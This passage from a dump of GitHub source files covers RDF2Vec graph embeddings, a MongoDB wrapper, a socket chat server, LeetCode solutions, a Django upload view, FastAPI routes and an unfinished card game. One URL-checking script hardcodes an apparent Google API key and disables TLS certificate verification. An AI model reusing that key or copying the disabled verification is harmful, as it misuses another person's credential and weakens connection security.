return {}\n return net[source]\n\ndef randomWalkUniform(triples, startNode, max_depth=5):\n next_node =startNode\n path = 'n'+str(startNode)+'->'\n for i in range(max_depth):\n neighs = getLinks(triples,next_node)\n #print (neighs)\n if len(neighs) == 0: break\n weights = []\n queue = []\n for neigh in neighs:\n for edge in neighs[neigh]:\n queue.append((edge,neigh))\n weights.append(1.0)\n edge, next_node = random.choice(queue)\n path = path+ 'e'+str(edge)+'->'\n path = path+ 'n'+str(next_node)+'->'\n\n return path\n\n\n\ndef preprocess(folders, filename):\n entity2id = {}\n relation2id = {}\n triples = {}\n\n ent_counter = 0\n rel_counter = 0\n for dirname in folders:\n for fname in os.listdir(dirname):\n if not filename in fname: continue\n print (fname)\n if fname.endswith('.gz'):\n gzfile= gzip.open(os.path.join(dirname, fname), mode='rt')\n else:\n gzfile =open(os.path.join(dirname, fname))\n\n for line in csv.reader(gzfile, delimiter=' ', quotechar='\"'):\n #print (line)\n h = line[0]\n r = line[1]\n t = line[2]\n\n #if not t.startswith('<'): continue\n\n if h in entity2id:\n hid = entity2id[h]\n else:\n entity2id[h] = ent_counter\n ent_counter+=1\n hid = entity2id[h]\n\n if t in entity2id:\n tid = entity2id[t]\n else:\n entity2id[t] = ent_counter\n ent_counter+=1\n tid = entity2id[t]\n\n if r in relation2id:\n rid = relation2id[r]\n else:\n relation2id[r] = rel_counter\n rel_counter+=1\n rid = relation2id[r]\n addTriple(triples, hid, tid, rid)\n print ('Relation:',rel_counter, ' Entity:',ent_counter)\n return entity2id,relation2id,triples\n\n\ndef preprocess(file_path):\n entity2id = {}\n relation2id = {}\n triples = {}\n\n ent_counter = 0\n rel_counter = 0\n \n print (file_path)\n if file_path.endswith('.gz'):\n file= gzip.open(file_path, mode='rt')\n else:\n file =open(file_path)\n\n for line in csv.reader(file, delimiter='\\t', quotechar='\"'):\n #print (line)\n h = line[0]\n r = line[1]\n t = line[2]\n\n #if not t.startswith('<'): continue\n\n if h in entity2id:\n hid = entity2id[h]\n else:\n entity2id[h] = ent_counter\n ent_counter+=1\n hid = entity2id[h]\n\n if t in entity2id:\n tid = entity2id[t]\n else:\n entity2id[t] = ent_counter\n ent_counter+=1\n tid = entity2id[t]\n\n if r in relation2id:\n rid = relation2id[r]\n else:\n relation2id[r] = rel_counter\n rel_counter+=1\n rid = relation2id[r]\n addTriple(triples, hid, tid, rid)\n print ('Relation:',rel_counter, ' Entity:',ent_counter)\n return entity2id,relation2id,triples\n\n\ndef randomNWalkUniform(triples, n, walks, path_depth):\n path=[]\n for k in range(walks):\n walk = randomWalkUniform(triples, n, path_depth)\n path.append(walk)\n path = list(set(path))\n return path\n \ndef saveData(entity2id, relation2id, triples, dirname):\n if not os.path.isdir(dirname):\n os.mkdir(dirname) \n \n entity2id_file= open(os.path.join(dirname, 'entity2id.txt'),'w')\n relation2id_file = open(os.path.join(dirname, 'relation2id.txt'),'w')\n train_file = open(os.path.join(dirname, 'train2id.txt'),'w')\n\n train_file.write(str(num_triples)+'\\n') \n for source in triples:\n for target in triples[source]: \n hid=source\n tid =target\n for rid in triples[source][target]:\n train_file.write(\"%d %d %d\\n\"%(hid,tid,rid))\n\n entity2id_file.write(str(len(entity2id))+'\\n') \n for e in sorted(entity2id, key=entity2id.__getitem__):\n entity2id_file.write(e+'\\t'+str(entity2id[e])+'\\n') \n\n relation2id_file.write(str(len(relation2id))+'\\n') \n for r in sorted(relation2id, key=relation2id.__getitem__):\n 
relation2id_file.write(r+'\\t'+str(relation2id[r])+'\\n') \n \n train_file.close()\n entity2id_file.close()\n relation2id_file.close()\n\n\ndef extractFeatureVector(model, drugs, id2entity, output): \n \n header=\"Entity\"\n ns = \"n\"\n\n for i in range(model.wv.vectors.shape[1]):\n header=header+\"\\tfeature\"+str(i)\n \n fw=open(output,'w')\n fw.write(header+\"\\n\")\n\n for id_ in sorted(drugs):\n nid =ns+str(id_)\n if (nid) not in model.wv:\n print (nid)\n continue\n vec = model.wv[nid]\n vec = \"\\t\".join(map(str,vec))\n fw.write( id2entity[id_]+'\\t'+str(vec)+'\\n')\n fw.close()\n\n\ndef trainModel(drugs, id2entity, datafilename, model_output, vector_file, pattern, maxDepth):\n \n if not os.path.isdir(model_output):\n os.mkdir(model_output)\n\n \n output = os.path.join(model_output, pattern)\n if not os.path.isdir(output):\n os.mkdir(output)\n \n sentences = MySentences(datafilename, filename=pattern) # a memory-friendly iterator\n model1 = gensim.models.Word2Vec(size=200, min_count=1, workers=8, window=5, sg=1, negative=15, iter=5)\n model1.build_vocab(sentences)\n\n model1.train(sentences, total_examples=model1.corpus_count, epochs =5)\n modelname = 'Entity2Vec_sg_200_5_5_15_2_500'+'_d'+str(maxDepth)\n model1.save(os.path.join(output,modelname))\n \n extractFeatureVector(model1, drugs, id2entity, vector_file)\n del model1\n\n\nclass MySentences(object):\n def __init__(self, dirname, filename):\n self.dirname = dirname\n self.filename = filename\n\n def __iter__(self):\n print ('Processing ',self.filename)\n for subfname in os.listdir(self.dirname):\n if not self.filename in subfname: continue\n fpath = os.path.join(self.dirname, subfname)\n for fname in os.listdir(fpath):\n if not 'part' in fname: continue\n if '.crc' in fname: continue\n try:\n for line in open(os.path.join(fpath, fname), mode='r'):\n line = line.rstrip('\\n')\n words = line.split(\"->\")\n yield words\n except Exception:\n print(\"Failed reading file:\")\n print(fname)\n\n\n\nif __name__==\"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-tr',required=True, dest='rdf_file', help='enter folder path for rdf file')\n parser.add_argument('-w',required=True, dest='walk_folder', help='enter folder path for walks (seqence) to be stored')\n parser.add_argument('-kg',required=True, dest='kg_folder', help='enter folder path for knowledge graphs (as encoded n{#} for entities and e{#} for relation n) to be saved in relation2id and entity2id ')\n parser.add_argument('-m',required=True, dest='model_folder', help='enter folder path for model file to be stored')\n parser.add_argument('-v',required=True, dest='vector_file', help='enter path for model file to be saved')\n\n args = parser.parse_args()\n\n rdf_file= args.rdf_file\n walk_folder = args.walk_folder\n graph_folder = args.kg_folder\n model_folder = args.model_folder\n vector_file = args.vector_file\n\n\n\n findspark.init()\n if False: \n sc.stop()\n\n config = SparkConf()\n config.setMaster(\"local[10]\")\n config.set(\"spark.executor.memory\", \"70g\")\n config.set('spark.driver.memory', '90g')\n config.set(\"spark.memory.offHeap.enabled\",True)\n config.set(\"spark.memory.offHeap.size\",\"50g\") \n sc = SparkContext(conf=config)\n print (sc)\n\n\n #fileext = '.nq.gz'\n entity2id, relation2id, triples = preprocess(rdf_file)\n\n num_triples=0\n for source in triples:\n for target in triples[source]:\n num_triples+=len(triples[source][target])\n print ('Number of triples',num_triples)\n\n\n\n entities = list(entity2id.values())\n b_triples = 
sc.broadcast(triples)\n\n\n #folder = './walks/'\n folder = walk_folder\n if os.path.isdir(folder):\n shutil.rmtree(folder) \n os.mkdir(folder)\n \n walks = 250\n maxDepth = 5\n for path_depth in range(1,maxDepth):\n filename = os.path.join(folder,'randwalks_n%d_depth%d_pagerank_uniform.txt'%(walks, path_depth))\n print (filename)\n start_time =time.time()\n rdd = sc.parallelize(entities).flatMap(lambda n: randomNWalkUniform(b_triples.value, n, walks, path_depth))\n rdd.saveAsTextFile(filename)\n elapsed_time = time.time() - start_time\n print ('Time elapsed to generate features:',time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time)))\n\n\n #dirname = './graph'\n os.mkdir(graph_folder)\n saveData(entity2id, relation2id, triples, graph_folder)\n\n print (len(entities))\n\n\n id2entity = { value:key for key,value in entity2id.items()} \n\n #datafilename = './walks/'\n #model_output = './models/' \n os.mkdir(model_folder)\n\n pattern = 'uniform'\n #vector_output = './vectors/'\n trainModel(entities, id2entity, walk_folder, model_folder, vector_file, pattern, maxDepth)\n","repo_name":"MaastrichtU-IDS/FaVLib","sub_path":"src/RDF2Vec.py","file_name":"RDF2Vec.py","file_ext":"py","file_size_in_byte":10130,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"18957993777","text":"# coding: utf-8\nfrom pymongo import MongoClient\n\n\nclass MongodbClient:\n\n @property\n def mongodb_client(self):\n client = MongoClient(host='47.92.27.75', port=27017)\n db = client['on_app_location']\n db['test'].ensure_index([('location', '2dsphere')])\n return db['test']\n\n def insert(self, data):\n try:\n res = self.mongodb_client.insert(data)\n except Exception as e:\n res = 'Mongodb异常'\n return res\n\n def update(self, old_data, new_data):\n try:\n res = self.mongodb_client.update(old_data, new_data)\n except Exception as e:\n res = 'Mongodb异常'\n return res\n\n def find_all(self, condition=None, max_length=100):\n try:\n res = self.mongodb_client.find(condition).limit(max_length)\n except Exception as e:\n res = 'Mongodb异常'\n return res\n\n def delete(self, data):\n try:\n res = self.mongodb_client.remove(data)\n except Exception as e:\n res = 'Mongodb异常'\n return res\n\n def aggregate(self, condition=None):\n try:\n res = self.mongodb_client.aggregate(condition)\n except Exception as e:\n res = 'Mongodb异常'\n return res\n\n\nmongodb_cli = MongodbClient()\n","repo_name":"bobowang2017/python_study","sub_path":"mongodb/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44442999904","text":"import socket\nfrom typing import Tuple\n\n\nclass Server:\n _sock = _addr = _port = None\n def __init__(self, addr: str, port: int) -> None:\n self.sock = (addr, port)\n self.addr = addr\n self.port = port\n\n self.clients = []\n self.buffer = []\n \n while True:\n try:\n self.sock.listen(1)\n conn, addr = self.sock.accept()\n conn.settimeout(1)\n print(\"Connected by:\", addr)\n self.clients.append([conn, addr])\n except TimeoutError:\n pass\n\n self.recv_msg()\n \n\n @property\n def sock(self) -> socket.socket:\n return self._sock\n\n @sock.setter\n def sock(self, value: Tuple[str, int]) -> None:\n self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._sock.settimeout(1)\n self._sock.bind(value)\n print(f\"[+] Listening on {value[0]}:{value[1]}\")\n\n @property\n def addr(self) -> str:\n return self._addr\n\n 
@addr.setter\n def addr(self, value: str) -> None:\n self._addr = value\n\n @property\n def port(self) -> int:\n return self._port\n\n @port.setter\n def port(self, value: int) -> None:\n self._port = value\n\n def recv_msg(self) -> None:\n for conn, addr in self.clients:\n try:\n data = conn.recv(1024)\n if not data: continue\n print(f\"Got {data.decode()} from {addr}\")\n self.buffer.append([addr, data.decode()])\n self.redistribute()\n except TimeoutError:\n continue\n\n def redistribute(self) -> None:\n to_remove = []\n for i, [conn, addr] in enumerate(self.clients):\n try:\n conn.sendall(self.buffer[-1][1].encode())\n except: # Client disconnected\n print(f\"[!] {addr} disconnected\")\n to_remove.append(i)\n if to_remove:\n for i, indx in enumerate(to_remove):\n self.clients.pop(indx - i)\n\n\nif __name__ == \"__main__\":\n server = Server(\"192.168.77.119\", 50508)\n","repo_name":"MattTheCoder-W/chat-rooms","sub_path":"src/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35764083440","text":"import errno\nimport socket\nimport sys\n\n\ndef patch_redis_empty_recv():\n \"\"\"On Windows, socket disconnects result in errors rather than empty reads.\n redis-py does not handle these errors correctly.\n This patch translates connection resets to empty reads as in POSIX.\n \"\"\"\n assert sys.platform == \"win32\"\n import redis\n\n def redis_recv(sock, *args, **kwargs):\n result = b\"\"\n try:\n result = redis._compat.recv(sock, *args, **kwargs)\n except socket.error as ex:\n if ex.errno not in [errno.ECONNRESET, errno.ECONNREFUSED]:\n raise\n return result\n\n redis.connection.recv = redis_recv\n","repo_name":"HuantWang/SUPERSONIC","sub_path":"third_party/ray/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"37"} +{"seq_id":"3888355535","text":"'''\nTWO SUM\n-------\nGiven an array of integers, return indices of the two numbers such that they add up to a specific target.\nYou may assume that each input would have exactly one solution, and you may not use the same element twice.\n\nRESTATE\nIn a list, find the two numbers that add up to the number you're looking for. You may not use the same number twice, and there is only 1 pair of numbers that add up to the correct number.\n\nCLARIFYING\nIs it sorted? How long is the input list?\n\nASSUMPTIONS\nI'll assume not sorted and the length of the list tends to be within double digits\n\nBRAINSTORM\nMy initial, brute-force, idea would be to check each number against each other and find the ones that add up.\n\nEXPLAIN\nHere we have an O(n^2) solution in which we check each element against every other element.\nBecause they have to be two separate elements we skip looking at the same element.\nThen we simply check if it sums properly and return the pair of indices.\n\nTRADEOFFS\nOverall it's less time efficient but is more memory efficient.\n'''\n\ndef two_sum(nums, target):\n # materialize the enumeration so both loops can iterate over it\n indexed = list(enumerate(nums))\n for index, ele in indexed:\n for other_index, other_ele in indexed:\n if index == other_index:\n continue\n if ele + other_ele == target:\n return (index, other_index)\n\n'''\nADD TWO NUMBERS\n-------\nYou are given two non-empty linked lists representing two non-negative integers. The digits are stored in reverse order and each of their nodes contain a single digit. 
Add the two numbers and return it as a linked list.\n\nYou may assume the two numbers do not contain any leading zero, except the number 0 itself.\n\nRESTATE\nEssentially we have two reverse-order numbers that need to be queued up and converted into integers. The sum is then converted back into a reverse-order linked list and returned.\n\nCLARIFYING\nIs the linked list singly linked? Can I use built in Queue structure?\n\nASSUMPTIONS\nI'll assume I can use built in queue structure and the linked list is singly linked.\n\nBRAINSTORM\nI have to queue up both numbers so I'll build an object type that takes in the reversed linked list and works back and forth for converting.\n\nEXPLAIN\nSo I've built an object which accepts the list or the number and converts it depending on which one you pass it.\nIt utilizes the queue structure to reverse it and build it into a linked list, or to reverse the linked list and build it into a number.\n\nTRADEOFFS\nSo far it's linear time complexity. I think the algorithms are generally efficient. I've built an object to handle the conversions cleanly.\nWhile you can do it without it, it's more maintainable and readable this way.\n'''\nimport queue\n\n# included in starter code\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass ReverseNumber():\n def __init__(self, **kwargs):\n self.list = None\n self.number = None\n\n if \"list\" in kwargs:\n self.list = kwargs[\"list\"]\n self.get_num()\n if \"number\" in kwargs:\n self.number = kwargs[\"number\"]\n self.get_reverse()\n \n def get_reverse(self):\n num = str(self.number)\n num_q = queue.Queue()\n # queue digits least-significant first so the list stores them in reverse order\n for digit in reversed(num):\n num_q.put(digit)\n\n head = ListNode(None)\n last_node = head\n while not num_q.empty():\n node = ListNode(int(num_q.get()))\n last_node.next = node\n last_node = node\n \n self.list = head.next\n \n def get_num(self):\n num_q = queue.Queue()\n this_node = self.list\n while this_node:\n num_q.put(this_node.val)\n this_node = this_node.next\n \n final_num = \"\"\n while not num_q.empty():\n # digits come out least-significant first, so prepend\n final_num = str(num_q.get()) + final_num\n \n self.number = int(final_num)\n\ndef solution(l1, l2):\n l1 = ReverseNumber(list = l1)\n l2 = ReverseNumber(list = l2)\n total = l1.number + l2.number\n total = ReverseNumber(number = total)\n return total.list","repo_name":"type9/spd1.4-problems","sub_path":"leetcodeproblems.py","file_name":"leetcodeproblems.py","file_ext":"py","file_size_in_byte":3940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26035157907","text":"# coding=utf-8\nfrom django.utils.http import is_safe_url\nimport pandas as pd \nimport requests\nimport urllib3\n\n# def check_safety(filename):\n# \tdata = pd.read_csv(filename)\n# \tsafe_url = []\n\n# \tfor url in data['news_url']:\n# \t\ttempUrl = str(url)\n# \t\tif not tempUrl == 'nan':\n# \t\t\tif is_safe_url(tempUrl, allowed_hosts='www.youtube.com'):\n# \t\t\t\t#print('This url is safe')\n# \t\t\t\tsafe_url.append(tempUrl)\n# \t\t\telse:\n# \t\t\t\tprint('This url is risky: ', tempUrl)\n\n\n# \tname = ['news_url']\n# \tsafe_csv = pd.DataFrame(columns=name, data=safe_url)\n# \tsafe_csv.to_csv('../safe_url1.csv', encoding='utf-8')\n\nkey = 'AIzaSyBZZ7tN83YYztM8KH9t6CH1YRQVcnnX6Ec'\nURL = \"https://sb-ssl.google.com/safebrowsing/api/lookup?client=api&apikey={key}&appver=1.0&pver=3.0&url={url}\"\nurllib3.disable_warnings()\n\ndef check_safety(filename):\n\tdata = pd.read_csv(filename)\n\tsafe_url = []\n\tmalware = 0\n\tindex = 0\n\n\tfor url in data['news_url'][16000::]:\n\t\ttempUrl 
= str(url)\n\t\tif not tempUrl == 'nan':\n\t\t\tresp = requests.get(URL.format(key=key, url=tempUrl), verify=False)\n\n\t\t\tif resp.text != 'malware':\n\t\t\t\tprint('Safe ', index)\n\t\t\t\tsafe_url.append(tempUrl)\n\t\t\telse:\n\t\t\t\tprint('This url is harmful: ', tempUrl)\n\t\t\t\tmalware += 1\n\t\tindex += 1\n\n\n\tprint('Harmful url number: ', malware)\n\tname = ['news_url']\n\tsafe_csv = pd.DataFrame(columns=name, data=safe_url)\n\tsafe_csv.to_csv('../safe_url1.csv', encoding='utf-8')\n\t#for url in data['news_url']:\n\t\t\n\n\n\n","repo_name":"myr-ryan/metamorphic_testing_fake_news","sub_path":"script/is_safe_url.py","file_name":"is_safe_url.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72750221226","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\n\nfrom .models import UploadFile\nfrom .forms import UploadForm\nfrom .tasks import timestamp, gzip_compress\n\ndef list(request):\n # Handle file upload\n if request.method == 'POST':\n form = UploadForm(request.POST, request.FILES)\n if form.is_valid():\n newfile = UploadFile(uploadfile = request.FILES['uploadfile'])\n newfile.save()\n timestamp.delay()\n gzip_compress.delay(file_in = newfile)\n # Redirect to the uploaded files list after POST\n return HttpResponseRedirect(reverse('file_process.views.list'))\n else:\n form = UploadForm() # An empty, unbound form\n\n # Load documents for the list page\n uploadfiles = UploadFile.objects.all()\n\n # Render list page with the documents and the form\n return render_to_response(\n 'file_process/list.html',\n {'uploadfiles': uploadfiles, 'form': form},\n context_instance=RequestContext(request)\n )\n","repo_name":"madprime/django_celery_fileprocess_example","sub_path":"file_process/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37424034179","text":"import os\nimport json\nfrom . 
import BaseAction\nfrom ....db.hubdata.localslugs import SlugDb\nfrom ...content.card import ModelCard\nfrom ....default import CARD_FILE\n\n\nclass CardGetter(BaseAction):\n def __init__(self, model_id, config_json):\n BaseAction.__init__(\n self, model_id=model_id, config_json=config_json, credentials_json=None\n )\n self.mc = ModelCard(config_json=config_json)\n self.slugdb = SlugDb(config_json=config_json)\n\n def get(self):\n self.logger.debug(\"Getting model card of {0}\".format(self.model_id))\n card = self.mc.get(self.model_id, as_json=False)\n slug = card[\"Slug\"]\n model_path = self._model_path(self.model_id)\n card_path = os.path.join(model_path, CARD_FILE)\n with open(card_path, \"w\") as f:\n json.dump(card, f, indent=4)\n self.logger.debug(\"Card saved at {0}\".format(card_path))\n self.logger.debug(\"Saving slug {0}\".format(slug))\n self.slugdb.insert(self.model_id, slug)\n","repo_name":"ersilia-os/ersilia","sub_path":"ersilia/hub/fetch/actions/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"37"} +{"seq_id":"18499730848","text":"from fastapi import FastAPI\nfrom database import database, updates\nfrom models.update import UserUpdate, UserUpdateIn\n\napp = FastAPI()\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\n@app.post(\"/update\", response_model=UserUpdate)\nasync def create_update(update: UserUpdateIn):\n query = updates.insert().values(name=update.name, body=update.body)\n last_record_id = await database.execute(query)\n return {**update.dict(), \"id\": last_record_id}\n\n\n@app.get(\"/updates\", response_model=list[UserUpdate])\nasync def get_all_updates():\n query = updates.select()\n return await database.fetch_all(query)\n","repo_name":"tecladocode/fastapi-course","sub_path":"project/01-post-updates/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15186554599","text":"from collections import defaultdict\nimport ui_utils as ui\nfrom enum import Enum\nfrom dataclasses import dataclass\nfrom typing import List\nimport random\nimport operator\n\nclass Rank(Enum):\n ACE = 1\n TWO = 2\n THREE = 3\n FOUR = 4\n FIVE = 5\n SIX = 6\n SEVEN = 7 \n EIGHT = 8\n NINE = 9\n TEN = 10\n JACK = 11\n QUEEN = 12\n KING = 13\n\n def format(self):\n traductions = [str(i+1) for i in range(10)] + ['J', 'Q', 'K']\n return traductions[self.value-1]\n\nclass Suit(Enum):\n CLUB = 1\n DIAMOND = 2\n HEART = 3\n SPADE = 4\n\nclass Colors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nclass Card:\n def __init__(self, rank: Rank, suit: Suit):\n self.rank = rank\n self.suit = suit\n self.format = '{}'.format(self.rank.format())\n self._is_discovered = False\n\n def discover(self, yes: bool):\n self._is_discovered = yes\n\n def is_discovered(self):\n return self._is_discovered\n\n def __repr__(self):\n return '{}'.format(self.format)\n\n def __eq__(self, obj):\n return isinstance(obj, Card) and self.format == obj.format\n\n def __hash__(self):\n return hash((self.rank, self.suit))\n\nclass CommandKeys(Enum):\n QuitKey = 'Q'\n KoboKey = 'K'\n\nclass PlayerInput:\n 
def __init__(self):\n self.is_index = False\n self.is_command = False\n self.is_kobo = False\n self.is_quit_key = False\n self.value = ''\n\n def input_loop(self, nb_cards, msg='', accept_indexes=False, accept_commands=False) -> None:\n \"\"\" loop asking the user to enter an answer.\n \"\"\"\n self.value = self._input(msg)\n \n while (accept_indexes and accept_commands and not self._is_correct(nb_cards)) \\\n or (accept_indexes and not accept_commands and not self._check_card_index(nb_cards)) \\\n or (accept_commands and not accept_indexes and not self._check_command()):\n print(self._invalid_input_msg(nb_cards))\n self.value = self._input(msg)\n if self._check_kobo():\n self.is_kobo = True\n if self._check_card_index(nb_cards):\n self.value = int(self.value) - 1\n self.is_index = True\n elif self._check_command():\n self.is_command = True\n if self.is_command and self.value == CommandKeys.QuitKey.value:\n self.is_quit_key = True\n\n def _input(self, msg: str='') -> str:\n return input(msg)\n\n def _is_correct(self, nb_cards: int) -> bool:\n \"\"\" returns whether the user's input is correct. \n In bound of the number of cards or a command.\n \"\"\"\n return self._check_card_index(nb_cards) or self._check_command()\n\n def _check_card_index(self, nb_cards: int) -> bool:\n inp = self.value.split()\n if not 1 <= len(inp) <= 2:\n return False\n inp = inp[0]\n if not inp.isdigit():\n return False\n inp = int(inp)\n return 1 <= inp <= nb_cards\n\n def _check_command(self) -> bool:\n inp = self.value.split()\n if not 1 <= len(inp) <= 2:\n return False\n cmd = inp[0]\n return self._is_valid_command(cmd)\n\n def _check_kobo(self) -> bool:\n inp = self.value.split()\n if len(inp) != 2:\n return False\n cmd = inp[1]\n is_kobo = self._is_valid_command(cmd) and cmd == CommandKeys.KoboKey.value\n if is_kobo:\n # keep only the card index / command token, dropping the kobo flag\n self.value = inp[0]\n return is_kobo\n\n def _is_valid_command(self, cmd: str):\n return isinstance(cmd, str) and cmd in set(item.value for item in CommandKeys)\n\n def _invalid_input_msg(self, nb_cards: int):\n digit_valid = [*range(1, nb_cards + 1)]\n return 'Invalid command, valid commands: {}'.format( \\\n [*digit_valid, *list(map(lambda x: x.value, [*CommandKeys]))])\n\nclass Game:\n def __init__(self, nb_cards=4):\n self.nb_cards = nb_cards\n self._init_players()\n self._init_game()\n self._displayed_cards = [0, 1]\n self._should_display_cards = True\n\n def pop_card(self):\n if len(self.deck) == 0:\n print('The deck is empty!')\n exit()\n return self.deck.pop()\n\n def launch(self):\n player, ai = self.player, self.ai_player\n player_turn = bool(random.randint(0, 1))\n thrown_cards: List[Card]\n\n while True:\n deck_card = self.pop_card()\n if player_turn:\n # if self._should_display_cards:\n # player.display_cards(visible_cards=self._displayed_cards)\n # player._display_deck_card(deck_card)\n thrown_cards = player.play(deck_card)\n self._displayed_cards = []\n else:\n ai.display_cards()\n ai._display_deck_card(deck_card)\n thrown_cards = ai.play(deck_card)\n self._throw_duplicate_cards(thrown_cards, player_turn)\n self.thrown_deck += thrown_cards\n print(('PLAYER' if player_turn else 'AI') + ' PLAYS')\n visible_cards = [c for c in ai.cards if c.is_discovered()]\n if not player_turn:\n print(f'Visible cards: {visible_cards}')\n print(f'Cards: {ai.cards}')\n print(f'Kobo: {ai.is_kobo}')\n\n player_turn = not player_turn\n if self._check_victory(player, ai):\n break\n\n def _init_players(self):\n self.ai_player = AIPlayer(self)\n self.player = Player(self)\n\n def _init_game(self):\n 
self.thrown_deck = []\n deck = []\n for suit in Suit:\n for rank in Rank:\n card = Card(rank, suit)\n deck.append(card)\n random.shuffle(deck)\n self.deck = deck\n\n cards = []\n nb_players = 2\n for _ in range(nb_players):\n tmp = []\n for _ in range(self.nb_cards):\n tmp.append(self.pop_card())\n cards.append(tmp.copy())\n self.ai_player.set_cards(cards[0])\n # self.ai_player.set_cards([Card(Rank.ACE, Suit.CLUB), Card(Rank.NINE, Suit.CLUB), Card(Rank.FOUR, Suit.CLUB), Card(Rank.NINE, Suit.CLUB)])\n self.player.set_cards(cards[1])\n\n def _check_victory(self, player, ai_player):\n if len(player.cards) == 0:\n player.win()\n print('YOU WON')\n return True\n elif len(ai_player.cards) == 0:\n ai_player.win()\n print('THE AI WON')\n return True\n return False\n\n def set_displayed_cards(self, cards: [int]):\n self._displayed_cards = cards\n\n def set_should_display_cards(self, should: bool):\n self._should_display_cards = should\n \n def nb_occurences_in_deck(self, rank: Rank):\n return len([c for c in self.deck if c.rank == rank])\n\n def _throw_duplicate_cards(self, thrown_cards: List[Card], player_turn: bool):\n thrown_ranks = list(map(lambda x: x.rank, thrown_cards))\n other_player = self.player if not player_turn else self.ai_player\n for c in other_player.cards:\n if c.rank in thrown_ranks:\n print(f'{c} is a duplicate card!')\n other_player.cards.remove(c)\n # IMPORTANT !!! handle the effects of cards (queen or J if duplicate) use inheritance for methods\n\n\nclass PlayerI:\n def __init__(self, game):\n self.game = game\n self.victories = 0\n self.is_kobo = False\n\n def set_cards(self, cards):\n self.cards = cards\n for c in self.cards[:2]:\n c.discover(True)\n\n @property\n def nb_cards(self):\n return len(self.cards)\n\n @property\n def _hidden_cards(self):\n return [i for i in range(self.nb_cards) if not self.cards[i].is_discovered()]\n\n def win(self):\n self.victories += 1\n\n def play(self, deck_card):\n pass\n\n def _apply_card_effects(self, thrown_cards):\n pass\n\n def _substitute_card(self, index: int, deck_card: Card):\n selected = self.cards[index]\n deck_card.discover(True)\n thrown_cards = [self.cards.pop(index)]\n self.cards.insert(index, deck_card)\n\n # remove all duplicates of the chosen card\n updated_cards = self.cards.copy()\n for i in range(len(self.cards)):\n c = self.cards[i]\n if c.is_discovered() and c == selected:\n thrown_cards.append(updated_cards.pop(i))\n self.cards = updated_cards\n return thrown_cards\n\n def _do_not_substitute_card(self, deck_card: Card):\n thrown_cards = []\n updated_cards = self.cards.copy()\n for i in range(len(self.cards)):\n c = self.cards[i]\n if c.is_discovered() and c == deck_card:\n thrown_cards.append(updated_cards.pop(i))\n self.cards = updated_cards\n return thrown_cards\n\n def display_cards(self, visible_cards: List[int]=[]):\n cards = ' '.join([self.cards[i].format if i in visible_cards else self.cards[i].format for i in range(len(self.cards))])\n styled = ui.wrap_str_in_stars(cards)\n print(styled)\n # print(' '.join([c.format for c in self.cards]))\n\n def _display_deck_card(self, card: Card):\n print('New card')\n styled = ui.wrap_str_in_stars(card.format)\n print(styled + Colors.ENDC)\n\n def _trigger_queen_effect(self, card_index: int):\n self.cards[card_index].discover(True)\n\n def _trigger_jack_effect(\n self, \n my_card_index: int, \n other_card_index: int,\n other_cards: List[Card]\n ):\n self.cards[my_card_index].discover(False)\n other_cards[other_card_index].discover(False)\n self.cards[my_card_index], 
other_cards[other_card_index] = \\\n other_cards[other_card_index], self.cards[my_card_index]\n\n\nclass Player(PlayerI):\n def __init__(self, game):\n super().__init__(game)\n\n def play(self, deck_card):\n inp = PlayerInput()\n inp.input_loop(self.nb_cards, msg='Your turn: ', accept_indexes=True, accept_commands=True)\n self.is_kobo = inp.is_kobo\n return self._handle_input(inp, deck_card)\n\n def _handle_input(self, inp: PlayerInput, deck_card: Card):\n if inp.is_index:\n thrown_cards = self._substitute_card(inp.value, deck_card)\n self._apply_card_effects(thrown_cards)\n return thrown_cards\n elif inp.is_command:\n if inp.is_quit_key:\n thrown_cards = self._do_not_substitute_card(deck_card)\n self._apply_card_effects(thrown_cards)\n return thrown_cards\n\n def _apply_card_effects(self, thrown_cards):\n self.game.set_should_display_cards(True)\n for card in thrown_cards:\n if card.rank == Rank.JACK:\n self.display_cards()\n inp = PlayerInput()\n inp.input_loop(self.nb_cards, msg='Which card do you wanna switch? ', accept_indexes=True, accept_commands=True)\n if inp.is_quit_key:\n break\n my_card = inp.value\n self.game.ai_player.display_cards()\n inp = PlayerInput()\n inp.input_loop(self.game.ai_player.nb_cards, msg='Which card do you wanna peek? ', accept_indexes=True)\n other_card = inp.value\n super()._trigger_jack_effect(my_card, other_card, self.game.ai_player.cards)\n\n if card.rank == Rank.QUEEN:\n inp = PlayerInput()\n 